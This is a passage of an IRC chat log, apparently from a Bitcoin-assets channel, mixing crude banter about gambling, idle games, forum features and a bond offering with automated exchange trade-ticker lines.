turn me into a gambler Sep 11 04:42:00 :D Sep 11 04:42:06 i tend to credit dooglus' conclusion even given the conflict of itnerest. Sep 11 04:42:21 pankkake if hope's all you got left you're in sad shape Sep 11 04:42:34 what he usually says is also against his interests, so… I would trust him Sep 11 04:42:46 yeah, he reminds me of me in that respect. Sep 11 04:43:09 shit I lost Sep 11 04:43:14 and didn't even watch Sep 11 04:43:31 I was at 1.25 and back to 1.11 in just one bot run Sep 11 04:43:39 I'm done :) Sep 11 04:43:41 yeah with this new game, you dont even have to hold H or L anymore its taht simple Sep 11 04:44:07 [BTCTC] [LABCOIN] 23 @ 0.0037 = 0.0851 BTC [-] Sep 11 04:44:08 [BTCTC] [LABCOIN] 2 @ 0.0037 = 0.0074 BTC [-] Sep 11 04:44:08 [BTCTC] [LABCOIN] 150 @ 0.003702 = 0.5553 BTC [+] Sep 11 04:44:15 the only times I would consider doing a real bet is with a 1% chance to win Sep 11 04:44:36 you just press "make my money dissapear" and then focus on other activities Sep 11 04:44:48 haha Sep 11 04:44:51 1 % sounds like lotto Sep 11 04:45:19 yeah but otherwise the gains aren't appealing Sep 11 04:45:32 I guess people have very different betting psychology Sep 11 04:45:47 kakobrekla you remember progress quest ? Sep 11 04:45:59 a game that plays for you? Sep 11 04:46:02 yup Sep 11 04:46:11 I think I played it. I love those Sep 11 04:46:14 watch numbers grow Sep 11 04:46:23 yeah Sep 11 04:46:36 http://progressquest.com/ Sep 11 04:46:39 Progress Quest Sep 11 04:47:11 im playing it right now. Sep 11 04:47:14 that's it, I lost it all. conclusion: don't roll high Sep 11 04:47:24 A shocking series of events leaves you alone and bewildered, but resolute... Sep 11 04:47:44 I played IdleRPG on IRC too Sep 11 04:47:56 dafuq is this shit Sep 11 04:47:59 I had something like 2 years on a network Sep 11 04:48:07 you join a channel and do nothing Sep 11 04:48:12 [BTCTC] [PAJKA.BOND] 140 @ 0.0125 = 1.75 BTC [-] Sep 11 04:48:17 if you quit, part, change nick, you get penalties Sep 11 04:48:26 http://progressquest.com/play/main.html#Uckmiep Sep 11 04:48:29 Progress Quest Sep 11 04:48:30 shit i level too slow. Sep 11 04:48:37 a few years ago it wasn't that easy, as internet and servers were expensive Sep 11 04:48:38 anyone offering leveling services ? Sep 11 04:48:40 You are Satoshi, the level 68 Terrorist. Next level in 22 days, 12:18:54 Sep 11 04:48:41 [BTCTC] [BTC-BOND] 200 @ 0.01 = 2 BTC [+] Sep 11 04:48:58 lol Sep 11 04:49:15 that reminds me Sep 11 04:49:30 actually it reminds me too, all you bums should be in eve! Sep 11 04:49:37 workin' da isk. Sep 11 04:49:38 had an idea bitcoin powered idlerpg Sep 11 04:49:51 dub provably idle ? Sep 11 04:49:52 I already have no life, I don't need more nolifing Sep 11 04:50:05 pankkake get a bf, you can nolife simultaneously. Sep 11 04:50:39 [HAVELOCK] [XBOND] 29 @ 0.00118 = 0.0342 BTC [-] Sep 11 04:50:42 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 11 04:50:48 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 11 04:50:54 a sex slave to satisfy me while I'm doing something else would be a gain of free time Sep 11 04:50:55 srsly, this is like 2:1 to deliver ?! Sep 11 04:51:11 [BTCTC] [CIPHERMINE.B1] 132 @ 0.01067 = 1.4084 BTC [-] Sep 11 04:51:13 [BTCTC] [CIPHERMINE.B1] 215 @ 0.01068 = 2.2962 BTC [+] Sep 11 04:51:14 [BTCTC] [CIPHERMINE.B1] 90 @ 0.01087 = 0.9783 BTC [+] Sep 11 04:51:20 are there reasons to think they won't? Sep 11 04:51:44 pankkake btw, i lolled at the morpheus moment on the misogyny thread Sep 11 04:52:06 yes. the reasons are called previous experience. nobody ever delivers. Sep 11 04:52:08 it's surprising when people say they were wrong Sep 11 04:52:28 i guess you suck as a troll. you should get them to rage not to personally grow. Sep 11 04:52:30 bitfury did! Sep 11 04:52:31 [BTCTC] [CIPHERMINE.B1] 120 @ 0.01088 = 1.3056 BTC [+] Sep 11 04:52:45 pankkake only because anduck paid fractal 5 btc or some shady milkshit. Sep 11 04:52:52 eh, I don't always want to, and I have enough ignores already Sep 11 04:52:58 :)) Sep 11 04:53:33 you only have enough ignores when entire pages of teh AM thread are blank Sep 11 04:53:50 [HAVELOCK] [SDSTM] 10 @ 0.0027 = 0.027 BTC [+] Sep 11 04:53:53 [HAVELOCK] [SDSTM] 42 @ 0.00261002 = 0.1096 BTC [-] Sep 11 04:53:55 [HAVELOCK] [SDSTM] 5 @ 0.00251 = 0.0126 BTC [-] Sep 11 04:53:57 [HAVELOCK] [SDSTM] 5 @ 0.0025005 = 0.0125 BTC [-] Sep 11 04:53:57 dub how about labgroin/activedumbing/etc ? Sep 11 04:53:59 [HAVELOCK] [SDSTM] 139 @ 0.00250004 = 0.3475 BTC [-] Sep 11 04:54:00 [HAVELOCK] [SDSTM] 15 @ 0.00250003 = 0.0375 BTC [-] Sep 11 04:54:02 [HAVELOCK] [SDSTM] 50 @ 0.00250001 = 0.125 BTC [-] Sep 11 04:54:04 [HAVELOCK] [SDSTM] 484 @ 0.0025 = 1.21 BTC [-] Sep 11 04:54:05 oh, I have like 160 users ignored, but I meant people ignoring me Sep 11 04:54:08 I don't look at those Sep 11 04:54:15 [HAVELOCK] [SDSTM] 116 @ 0.0025 = 0.29 BTC [-] Sep 11 04:54:34 truth be told I stopped looking at the AM one too Sep 11 04:54:40 dub that's like going to india and not eating shit. why are you there then even Sep 11 04:54:42 lol labgroin/activedumbing. I like labcon/inactivemining better Sep 11 04:54:43 [HAVELOCK] [CBTC] 1371 @ 0.0003 = 0.4113 BTC [+] Sep 11 04:54:45 [HAVELOCK] [CBTC] 1043 @ 0.0003 = 0.3129 BTC [+] Sep 11 04:54:47 [HAVELOCK] [CBTC] 7586 @ 0.00030199 = 2.2909 BTC [+] Sep 11 04:54:51 labgroan Sep 11 04:54:52 on those threads I have ignored 90% of the users Sep 11 04:54:53 it varies. Sep 11 04:55:38 well your ignore button isn't even slightly yellow Sep 11 04:55:55 [HAVELOCK] [CBTC] 2843 @ 0.00030199 = 0.8586 BTC [+] Sep 11 04:55:58 [HAVELOCK] [CBTC] 4157 @ 0.000302 = 1.2554 BTC [+] Sep 11 04:56:16 I'm at an earlier stage, I see that people have ignored me (12-18) but it's not public yet Sep 11 04:56:27 I don't want to be yellow :(( Sep 11 04:56:56 [HAVELOCK] [DEALCO] 100 @ 0.0105 = 1.05 BTC [+] Sep 11 04:57:32 first frenchman afraid of piss. Sep 11 04:57:35 hehe Sep 11 04:57:48 it only works if the accounts are "active" Sep 11 04:57:55 so my idea of ignore-bombing can't work Sep 11 04:58:18 active = out of newb zone? Sep 11 04:58:25 https://bitcointalk.org/index.php?topic=68329.msg796962#msg796962 Sep 11 04:58:29 [Feature added] Color besides usernames for Ignored by % of established members. Sep 11 04:58:36 very established actually Sep 11 04:58:49 ic Sep 11 04:59:22 [BTCTC] [CIPHERMINE.B1] 230 @ 0.01088 = 2.5024 BTC [+] Sep 11 04:59:23 [BTCTC] [CIPHERMINE.B1] 20 @ 0.0109 = 0.218 BTC [+] Sep 11 05:00:12 "Matthew N. Wright is willing to contribute another 5BTC" and he now has a very brown Ignore button Sep 11 05:00:52 [BTCTC] [BITVPS] 28 @ 0.001999 = 0.056 BTC [+] Sep 11 05:01:04 [BTCTC] [ASICMINER-PT] 2 @ 2.256 = 4.512 BTC [-] Sep 11 05:01:06 [BTCTC] [ASICMINER-PT] 1 @ 2.255 BTC [-] Sep 11 05:01:07 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Sep 11 05:01:08 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Sep 11 05:01:10 [BTCTC] [ASICMINER-PT] 1 @ 2.246 BTC [-] Sep 11 05:01:11 [BTCTC] [ASICMINER-PT] 2 @ 2.238 = 4.476 BTC [-] Sep 11 05:01:40 contribute to what ? Sep 11 05:01:51 to the feature of colors on ignore buttons Sep 11 05:01:52 [HAVELOCK] [XBOND] 971 @ 0.00118 = 1.1458 BTC [-] Sep 11 05:02:33 lol wow Sep 11 05:03:05 [BTCTC] [TAT.ASICMINER] 20 @ 0.02092 = 0.4184 BTC [-] Sep 11 05:03:06 [BTCTC] [TAT.ASICMINER] 19 @ 0.02092 = 0.3975 BTC [-] Sep 11 05:03:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.02092 = 0.0837 BTC [-] Sep 11 05:03:08 [BTCTC] [TAT.ASICMINER] 32 @ 0.02091 = 0.6691 BTC [-] Sep 11 05:03:15 [HAVELOCK] [XBOND] 1500 @ 0.001185 = 1.7775 BTC [+] Sep 11 05:03:17 [HAVELOCK] [XBOND] 512 @ 0.0011875 = 0.608 BTC [+] Sep 11 05:03:20 [HAVELOCK] [XBOND] 176 @ 0.001188 = 0.2091 BTC [+] Sep 11 05:03:22 [HAVELOCK] [XBOND] 151 @ 0.00119 = 0.1797 BTC [+] Sep 11 05:03:24 [HAVELOCK] [XBOND] 690 @ 0.00119 = 0.8211 BTC [+] Sep 11 05:03:35 dar xbond Sep 11 05:03:45 dat Sep 11 05:03:59 yay I sold some again! Sep 11 05:04:12 xbond to the moon Sep 11 05:04:26 scam Sep 11 05:04:27 xbond is a scam now Sep 11 05:04:53 ... Sep 11 05:04:57 Oh, shit. I missed that. Sep 11 05:05:04 I used to sell and buy another one all the time, it made me rich too, but XBOND is even safer Sep 11 05:06:23 shut up scammor Sep 11 05:06:24 jkjkjk Sep 11 05:06:30 [BTCTC] [LABCOIN] 115 @ 0.00371 = 0.4267 BTC [+] Sep 11 05:07:02 [BTCTC] [COGNITIVE] 35 @ 0.2991 = 10.4685 BTC [-] Sep 11 05:07:03 [BTCTC] [COGNITIVE] 1 @ 0.2992 BTC [+] Sep 11 05:08:36 xbond combined with the bee thing is a very very well played move imho Sep 11 05:08:53 ThickAsThieves, still no estimated time to IPO for NEOBEE? Sep 11 05:08:57 yeah, played. Sep 11 05:09:16 [BTCTC] [LABCOIN] 107 @ 0.003715 = 0.3975 BTC [+] Sep 11 05:09:17 [BTCTC] [LABCOIN] 43 @ 0.003717 = 0.1598 BTC [+] Sep 11 05:09:43 likely late next week, still working on it Sep 11 05:09:59 [BTCTC] [LABCOIN] 16 @ 0.003715 = 0.0594 BTC [-] Sep 11 05:10:00 [BTCTC] [LABCOIN] 91 @ 0.003717 = 0.3382 BTC [+] Sep 11 05:10:09 [BTCTC] [COGNITIVE] 20 @ 0.3 = 6 BTC [+] Sep 11 05:10:10 [BTCTC] [COGNITIVE] 1 @ 0.308 BTC [+] Sep 11 05:10:12 [BTCTC] [COGNITIVE] 20 @ 0.31 = 6.2 BTC [+] Sep 11 05:10:13 [BTCTC] [COGNITIVE] 14 @ 0.32 = 4.48 BTC [+] Sep 11 05:10:17 I certainly wasn't expecting something that big Sep 11 05:10:19 Ok. And, just to be clear, if I trade an xbond for a pre-ipo share can I receive that share somewhere other than Havelock? Sep 11 05:10:47 xbonds are only redeemable for bitfunder shares Sep 11 05:10:51 Ah. Sep 11 05:10:55 Bitfunder is terrible Sep 11 05:10:58 lol Sep 11 05:11:03 you can xfer them later if you choose Sep 11 05:11:03 how does that work ThickAsThieves ? Sep 11 05:11:09 for a fee? Sep 11 05:11:12 u scammor Sep 11 05:11:14 jkjkjkjk Sep 11 05:11:15 yeah that's why I'm actually going to pay the 20% extra to be elsewhere than bf Sep 11 05:11:16 what, only for bitfunder shares? Sep 11 05:11:28 since I don't plan to invest enough to be worth the 1 BTC fee Sep 11 05:11:36 i think he's joking Sep 11 05:11:40 no Sep 11 05:11:42 I asked Sep 11 05:11:55 i was not joking, read the prospectus Sep 11 05:12:13 jesus christ man Sep 11 05:12:24 it was a limitation as part of negotiations Sep 11 05:12:28 You can always wait for the IPO to buy on one of the other exchanges. Sep 11 05:12:36 correct Sep 11 05:12:42 if its only for bitfunder thats a really shit deal Sep 11 05:12:55 We're strictly talking about the xbond element, ClivePalmer Sep 11 05:13:01 if you invest enough it can be worth the 1 BTC transfer fee Sep 11 05:13:22 i thought it could be exchange for anything tat had, no matter what exchange its on Sep 11 05:13:46 it also somewhat makes sense considering NEO has chosen BF as the underlying asset host Sep 11 05:13:46 but with bitfunder slowly dying and will probably be dead real soon wouldn't xbond just be worthless? Sep 11 05:13:53 [BTCTC] [CIPHERMINE.B1] 3 @ 0.01007 = 0.0302 BTC [-] Sep 11 05:13:54 [BTCTC] [CIPHERMINE.B1] 40 @ 0.01006 = 0.4024 BTC [-] Sep 11 05:13:56 [BTCTC] [CIPHERMINE.B1] 24 @ 0.01005 = 0.2412 BTC [-] Sep 11 05:13:57 [BTCTC] [CIPHERMINE.B1] 40 @ 0.01003 = 0.4012 BTC [-] Sep 11 05:14:12 [MPEX] [S.MPOE] 16100 @ 0.00088755 = 14.2896 BTC [+] Sep 11 05:14:14 you obv misunderstand xbond Sep 11 05:14:30 kind of missed the bitfunder only thing Sep 11 05:14:48 that is specific to this offering Sep 11 05:14:49 [BTCTC] [CIPHERMINE.B1] 450 @ 0.01001 = 4.5045 BTC [-] Sep 11 05:14:57 future offerings may be diff rules Sep 11 05:15:04 ahh k Sep 11 05:15:45 [BTCTC] [LABCOIN] 16 @ 0.003717 = 0.0595 BTC [+] Sep 11 05:15:46 i'd have preferred they be usable for any of the 3 neobees Sep 11 05:15:53 well, you can still sell them for almost .0012, i guess if one wants to get in, this is the cheapest way Sep 11 05:15:56 but it didnt pan out that way Sep 11 05:16:07 it also woudlve been more work for us Sep 11 05:16:39 as it is it'w plwnty to juggle Sep 11 05:16:52 sry typing from tab Sep 11 05:17:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.02092 = 0.0837 BTC [+] Sep 11 05:18:15 [BTCTC] [LABCOIN] 260 @ 0.003718 = 0.9667 BTC [+] Sep 11 05:19:12 [HAVELOCK] [CBTC] 233 @ 0.0003009 = 0.0701 BTC [-] Sep 11 05:20:31 [BTCTC] [DMS.SELLING] 536 @ 0.009693 = 5.1954 BTC [-] Sep 11 05:21:20 go home ThickAsThieves you're drunk with power Sep 11 05:21:23 jkjk Sep 11 05:21:42 [BTCTC] [DMS.MINING] 3 @ 0.002615 = 0.0078 BTC [+] Sep 11 05:21:43 [BTCTC] [DMS.MINING] 24 @ 0.002625 = 0.063 BTC [+] Sep 11 05:21:44 [BTCTC] [DMS.MINING] 504 @ 0.00265 = 1.3356 BTC [+] Sep 11 05:21:46 [BTCTC] [DMS.SELLING] 178 @ 0.009694 = 1.7255 BTC [+] Sep 11 05:21:56 !ticker m S.MPOE Sep 11 05:21:58 [MPEX:S.MPOE] 1D: 0.00087241 / 0.00088354 / 0.00090152 (573460 shares, 506.68 BTC), 7D: 0.00081 / 0.00088373 / 0.00090241 (2128566 shares, 1,881.09 BTC), 30D: 0.00081 / 0.00086084 / 0.00090241 (8156082 shares, 7,021.11 BTC) Sep 11 05:22:11 [BTCTC] [DMS.MINING] 15 @ 0.002661 = 0.0399 BTC [+] Sep 11 05:22:11 [BTCTC] [DMS.MINING] 100 @ 0.00269 = 0.269 BTC [+] Sep 11 05:22:13 [BTCTC] [DMS.MINING] 500 @ 0.0027 = 1.35 BTC [+] Sep 11 05:22:14 [BTCTC] [DMS.MINING] 1196 @ 0.0027 = 3.2292 BTC [+] Sep 11 05:22:15 [BTCTC] [DMS.MINING] 8 @ 0.0027 = 0.0216 BTC [+] Sep 11 05:22:16 [BTCTC] [DMS.MINING] 3 @ 0.0027 = 0.0081 BTC [+] Sep 11 05:22:45 [BTCTC] [DMS.MINING] 4 @ 0.00273 = 0.0109 BTC [+] Sep 11 05:22:46 [BTCTC] [DMS.MINING] 3 @ 0.002739 = 0.0082 BTC [+] Sep 11 05:22:48 [BTCTC] [DMS.MINING] 340 @ 0.00274 = 0.9316 BTC [+] Sep 11 05:22:57 !last m s.mpoe Sep 11 05:22:57 Last trade for S.MPOE on MPEX was at 0.00088755 BTC [+] Sep 11 05:24:51 [BTCTC] [DMS.SELLING] 28 @ 0.009695 = 0.2715 BTC [+] Sep 11 05:24:52 [BTCTC] [DMS.SELLING] 500 @ 0.009699 = 4.8495 BTC [+] Sep 11 05:27:54 [BTCTC] [DMS.SELLING] 6 @ 0.009738 = 0.0584 BTC [+] Sep 11 05:39:25 [BTCTC] [ACTIVEMINING] 10 @ 0.003402 = 0.034 BTC [+] Sep 11 05:39:45 [BTCTC] [ACTIVEMINING] 10 @ 0.003402 = 0.034 BTC [+] Sep 11 05:40:51 [BTCTC] [ACTIVEMINING] 463 @ 0.003412 = 1.5798 BTC [+] Sep 11 05:41:05 [BTCTC] [ACTIVEMINING] 74 @ 0.003412 = 0.2525 BTC [+] Sep 11 05:42:06 [BTCTC] [LABCOIN] 399 @ 0.00362 = 1.4444 BTC [-] Sep 11 05:43:07 [BTCTC] [KENILWORTH] 444 @ 0.001774 = 0.7877 BTC [-] Sep 11 05:43:21 http://www.businessinsider.com.au/the-gselevator-guide-to-being-a-man-2013-9 Sep 11 05:43:30 The Unofficial Goldman Sachs Guide To Being A Man | Business Insider Australia Sep 11 05:43:32 [BTCTC] [ACTIVEMINING] 174 @ 0.003239 = 0.5636 BTC [-] Sep 11 05:43:33 [BTCTC] [ACTIVEMINING] 27 @ 0.003236 = 0.0874 BTC [-] Sep 11 05:43:35 [BTCTC] [ACTIVEMINING] 125 @ 0.003231 = 0.4039 BTC [-] Sep 11 05:43:36 [BTCTC] [ACTIVEMINING] 500 @ 0.00323 = 1.615 BTC [-] Sep 11 05:43:37 [BTCTC] [ACTIVEMINING] 250 @ 0.003221 = 0.8053 BTC [-] Sep 11 05:43:38 [BTCTC] [ACTIVEMINING] 1000 @ 0.00322 = 3.22 BTC [-] Sep 11 05:43:40 [BTCTC] [ACTIVEMINING] 50 @ 0.003209 = 0.1605 BTC [-] Sep 11 05:43:41 [BTCTC] [ACTIVEMINING] 200 @ 0.003208 = 0.6416 BTC [-] Sep 11 05:43:42 [BTCTC] [ACTIVEMINING] 38 @ 0.003206 = 0.1218 BTC [-] Sep 11 05:43:42 guild to being slightly more of a baller bitcioners Sep 11 05:43:43 [BTCTC] [ACTIVEMINING] 155 @ 0.003205 = 0.4968 BTC [-] Sep 11 05:43:43 [BTCTC] [ACTIVEMINING] 16 @ 0.003203 = 0.0512 BTC [-] Sep 11 05:44:03 [BTCTC] [ACTIVEMINING] 394 @ 0.003407 = 1.3424 BTC [+] Sep 11 05:44:05 [BTCTC] [ACTIVEMINING] 27 @ 0.003408 = 0.092 BTC [+] Sep 11 05:44:41 [BTCTC] [LABCOIN] 201 @ 0.00362 = 0.7276 BTC [-] Sep 11 05:44:43 [BTCTC] [LABCOIN] 2000 @ 0.003689 = 7.378 BTC [+] Sep 11 05:45:02 [BTCTC] [ASICMINER-PT] 2 @ 2.3 = 4.6 BTC [+] Sep 11 05:46:45 [BTCTC] [PETA-MINE] 2 @ 0.6599 = 1.3198 BTC [+] Sep 11 05:47:26 [BTCTC] [CIPHERMINE.B1] 1 @ 0.0109 BTC [+] Sep 11 05:47:53 [BTCTC] [ACTIVEMINING] 10 @ 0.003407 = 0.0341 BTC [-] Sep 11 05:47:55 [BTCTC] [ACTIVEMINING] 140 @ 0.003408 = 0.4771 BTC [+] Sep 11 05:48:13 wait. australia figured it all out ? Sep 11 05:48:22 does it involve cangaroos in any wya ? Sep 11 05:48:58 [BTCTC] [KENILWORTH] 1 @ 0.001774 BTC [-] Sep 11 05:49:08 its from the gselevator twitter Sep 11 05:49:25 which you are following right? Sep 11 05:49:33 otherwise, there is no hope Sep 11 05:50:10 [BTCTC] [CIPHERMINE.B1] 2 @ 0.0109 = 0.0218 BTC [+] Sep 11 05:51:20 [BTCTC] [ACTIVEMINING] 2 @ 0.003399 = 0.0068 BTC [-] Sep 11 05:51:56 i have no idea wtf that is. Sep 11 05:52:32 pretty good list Sep 11 05:53:57 [BTCTC] [LABCOIN] 120 @ 0.00368 = 0.4416 BTC [-] Sep 11 05:53:59 I'm at least half a man already Sep 11 05:54:47 [BTCTC] [DMS.MINING] 45 @ 0.00274 = 0.1233 BTC [+] Sep 11 05:55:01 some of it is bunk Sep 11 05:55:31 Avoid that .last. whiskey. You.ve probably had enough. psshh Sep 11 05:55:53 twitter being manly, yeah no. though I get the "become your own curator of information" Sep 11 05:55:55 but there is gold like Sep 11 05:55:55 Don.t ever say, .it is what it is.. Sep 11 05:56:14 twitter is manly as fuck Sep 11 05:56:15 I love "Place-dropping is worse than-name dropping" Sep 11 05:56:28 tom ford is manly as fuck Sep 11 05:56:43 http://www.youtube.com/watch?v=glshAPHGScA Sep 11 05:56:45 Jay Z - Tom Ford (Lyrics) - YouTube Sep 11 05:56:51 my twittersphere is 80% whiskey and craft beer brewing Sep 11 05:57:02 [BTCTC] [LABCOIN] 130 @ 0.00365 = 0.4745 BTC [-] Sep 11 05:57:08 mine was 80% hipsters Sep 11 05:57:33 who's tom ford? Sep 11 05:57:41 the list is missing: dont make self-validating lists Sep 11 05:57:47 fuck outta here with dat trap Sep 11 05:57:47 hahaha Sep 11 05:58:10 "Ask for a salad instead of fries" so wrong Sep 11 05:58:28 Ron Swanson is my guide in life Sep 11 05:58:34 says mr french fries Sep 11 05:58:43 fries aren't even french Sep 11 05:58:46 silly americans Sep 11 05:58:51 brian butterfield is yours Sep 11 05:59:45 I feel so left out of this conversation. Sep 11 05:59:50 I guess y'all must be girls. Sep 11 06:00:09 "Piercings are liabilities in fights" glasses too Sep 11 06:00:43 http://www.youtube.com/watch?v=wtF3_ybJJ50 Sep 11 06:00:45 The Butterfield Diet (Peter Serafinowicz) - YouTube Sep 11 06:00:51 [BTCTC] [LABCOIN] 133 @ 0.00365 = 0.4855 BTC [-] Sep 11 06:00:58 who the fuck fights. Sep 11 06:01:08 after the 1st million or w/e. Sep 11 06:01:25 heh, i'm pretty sure all debts I have are settled (excepting that mortgage I have) Sep 11 06:01:30 well you don't always know some guy is going to hit you Sep 11 06:01:38 I'd never *start* a fight Sep 11 06:01:43 I would Sep 11 06:01:53 dub: so manly. take me now Sep 11 06:02:03 gotta come correct Sep 11 06:02:15 never is a silly word to use, most of the time :) Sep 11 06:02:19 smickles you're like the great hunchback whale by now Sep 11 06:02:22 come for air once a month Sep 11 06:02:36 heh, babies and work Sep 11 06:02:57 i thought you were a stay at home dadfinancier. what's the new job ? Sep 11 06:03:00 my little company skips along Sep 11 06:03:02 [BTCTC] [LABCOIN] 130 @ 0.00365 = 0.4745 BTC [-] Sep 11 06:03:05 usually willingness to fight is enough, and someone with a face fool of peircings has probably never been in a fight Sep 11 06:03:21 dub maybe he just plucks one off while laughing hysterically Sep 11 06:03:27 before bashing your head in with it. Sep 11 06:03:40 they call him Psycho Pierce Bob for a reason. Sep 11 06:03:45 its unlikely Sep 11 06:03:52 actuially Pierce is a name innit. Sep 11 06:04:00 Smickles Accounting Services, a limited company << what i meant by work Sep 11 06:04:17 ah ah Sep 11 06:04:48 I should hope to never be employed again, ownership all the way for me now :D Sep 11 06:05:16 give the kids a coupla years. Sep 11 06:06:09 oh, and I'm probably going to have to sue my previous landlord for my security deposit Sep 11 06:07:00 they trumped up a bunch of stuff after breaking 3 laws and sent me an invoice Sep 11 06:07:23 it might be fun should it get to the part where you stand up in front of a judge Sep 11 06:08:31 [BTCTC] [LABCOIN] 141 @ 0.003681 = 0.519 BTC [+] Sep 11 06:09:33 [BTCTC] [LABCOIN] 20 @ 0.003681 = 0.0736 BTC [+] Sep 11 06:09:51 [MPEX] [S.MPOE] 13800 @ 0.00088755 = 12.2482 BTC [+] Sep 11 06:10:50 unless the landlord is also bankrupt. Sep 11 06:12:18 heh, true. but they have plenty of assets (computers) i wouldn't mind taking Sep 11 06:12:48 0_o mpbor @ .95%? Sep 11 06:12:51 wth? Sep 11 06:16:01 yeah. Sep 11 06:18:01 [HAVELOCK] [AM100] 79 @ 0.0208001 = 1.6432 BTC [-] Sep 11 06:18:03 [HAVELOCK] [AM100] 2 @ 0.0208 = 0.0416 BTC [-] Sep 11 06:18:06 [HAVELOCK] [AM100] 6 @ 0.0208 = 0.1248 BTC [-] Sep 11 06:18:08 [HAVELOCK] [AM100] 5 @ 0.02077 = 0.1039 BTC [-] Sep 11 06:18:10 [HAVELOCK] [AM100] 10 @ 0.02076 = 0.2076 BTC [-] Sep 11 06:18:12 [HAVELOCK] [AM100] 10 @ 0.02075002 = 0.2075 BTC [-] Sep 11 06:24:42 [BTCTC] [DMS.MINING] 1000 @ 0.0026 = 2.6 BTC [-] Sep 11 06:27:31 lol, i just saw a historical note by jurov Sep 11 06:27:49 " BTC/USD closed at 13.37 :) " - December 2012 Sep 11 06:27:59 lol Sep 11 06:29:06 so ×10 every year? Sep 11 06:29:30 ಠ_ಠ Sep 11 06:30:14 gotta out all those decimal places to work i guess Sep 11 06:30:18 put* Sep 11 06:31:53 inb4 800.8135 this year Sep 11 06:32:07 that guy gets it Sep 11 06:32:20 héhé Sep 11 06:32:34 the numbers are code Sep 11 06:32:52 yeah yeah Sep 11 06:34:26 there are a lot of cool numbers to wait for; 2600, 9000 Sep 11 06:34:28 i dun believe it. MBPOR, as a whole, is only down 0.52% Sep 11 06:35:01 or 25%, depending on how to maths Sep 11 06:35:02 lol Sep 11 06:37:13 [BTCTC] [ASICMINER-PT] 1 @ 2.316 BTC [+] Sep 11 06:37:15 [BTCTC] [ASICMINER-PT] 1 @ 2.316 BTC [+] Sep 11 06:37:17 [BTCTC] [ASICMINER-PT] 2 @ 2.317 = 4.634 BTC [+] Sep 11 06:37:18 [BTCTC] [ASICMINER-PT] 21 @ 2.318 = 48.678 BTC [+] Sep 11 06:37:45 but -5.33% is prolly the way to look at it Sep 11 06:38:58 [BTCTC] [DMS.PURCHASE] 248 @ 0.01203 = 2.9834 BTC [-] Sep 11 06:41:55 how do you get so many different numbers out of mbor? Sep 11 06:42:01 mbpor* Sep 11 06:42:06 mpbor? Sep 11 06:42:15 [HAVELOCK] [AM1] 1 @ 2.29 BTC [+] Sep 11 06:42:20 mppoor? Sep 11 06:42:32 lol Sep 11 06:42:40 benkay mpbor is the monthly bonds rate Sep 11 06:42:46 it comes with the monthly reports. Sep 11 06:42:47 [HAVELOCK] [SMG] 50 @ 0.00019 = 0.0095 BTC [-] Sep 11 06:43:02 what i'm confused about is how smickles is getting all of those different numbers. Sep 11 06:43:18 [HAVELOCK] [AM100] 4 @ 0.021 = 0.084 BTC [+] Sep 11 06:43:53 having actually read this month's report, i don't know what smickles is going on about. Sep 11 06:44:08 most likely due to ignorance and idiocy but what else is new Sep 11 06:44:14 a. well he's doing maths. Sep 11 06:44:19 maths result in numbers. Sep 11 06:44:20 ergo. Sep 11 06:44:25 a topic in which i'm interested! Sep 11 06:44:39 and on which i am similarly humbly seeking enlightenment Sep 11 06:44:57 [HAVELOCK] [SDSTM] 5 @ 0.00299 = 0.015 BTC [+] Sep 11 06:45:29 i'd guess he's taken various averages and compared them ? Sep 11 06:45:32 but you know this is assets and mockery is more valued than education so it's just kind of this long running "what can i learn tonight" hustle Sep 11 06:45:35 [BTCTC] [ACTIVEMINING] 10 @ 0.003414 = 0.0341 BTC [+] Sep 11 06:45:37 [BTCTC] [ACTIVEMINING] 809 @ 0.003415 = 2.7627 BTC [+] Sep 11 06:45:42 [BTCTC] [ACTIVEMINING] 2000 @ 0.003416 = 6.832 BTC [+] Sep 11 06:45:45 [BTCTC] [ACTIVEMINING] 394 @ 0.003438 = 1.3546 BTC [+] Sep 11 06:45:47 [BTCTC] [ACTIVEMINING] 950 @ 0.00344 = 3.268 BTC [+] Sep 11 06:45:51 wherein i minute-cost-average my time investment in learning stuff Sep 11 06:45:54 some days there's return Sep 11 06:45:55 [BTCTC] [ACTIVEMINING] 1000 @ 0.003449 = 3.449 BTC [+] Sep 11 06:45:56 most days there isn't Sep 11 06:46:00 [BTCTC] [ACTIVEMINING] 100 @ 0.0035 = 0.35 BTC [+] Sep 11 06:46:05 [BTCTC] [ACTIVEMINING] 48 @ 0.003528 = 0.1693 BTC [+] Sep 11 06:46:08 [BTCTC] [ACTIVEMINING] 870 @ 0.00358 = 3.1146 BTC [+] Sep 11 06:46:15 that bad eh ? Sep 11 06:46:25 i exaggerate. Sep 11 06:46:40 i always thought it's quite the contrary, mockery being dispensed in the rare occasions arrogant idiots start typing, but otherwise education flowing like wine Sep 11 06:46:47 hm Sep 11 06:47:03 the practical sort for sure Sep 11 06:47:13 the "observe events, draw conclusions, occasionally place wagers" sort Sep 11 06:47:51 [BTCTC] [DMS.MINING] 11 @ 0.00261 = 0.0287 BTC [+] Sep 11 06:47:53 [BTCTC] [DMS.MINING] 139 @ 0.0026 = 0.3614 BTC [-] Sep 11 06:48:08 actually upon reflection i can confess i have no clue how he got 25%, 5.33% and .52% but seems an interesting series Sep 11 06:48:18 hey smickles explain your milk here! Sep 11 06:48:19 but less frequently are there answers to specific questions like "what precisely is smickles going on about?" Sep 11 06:48:33 well atm he's prolly breastfeeding Sep 11 06:49:38 in any event Sep 11 06:49:47 bout these here quantum simulations Sep 11 06:51:25 *crickets* Sep 11 06:51:31 what, you assholes don't have opinions? Sep 11 06:52:28 what simulation dawg Sep 11 06:52:53 those noo wackos Sep 11 06:52:55 [HAVELOCK] [XBOND] 8 @ 0.00116 = 0.0093 BTC [-] Sep 11 06:53:51 just some random dude. Sep 11 06:55:06 [HAVELOCK] [XBOND] 4 @ 0.00116 = 0.0046 BTC [-] Sep 11 06:55:16 [HAVELOCK] [XBOND] 6 @ 0.00115001 = 0.0069 BTC [-] Sep 11 06:56:26 [HAVELOCK] [AM100] 1 @ 0.021 BTC [+] Sep 11 06:57:30 [HAVELOCK] [CBTC] 9767 @ 0.0003009 = 2.9389 BTC [-] Sep 11 06:57:32 [HAVELOCK] 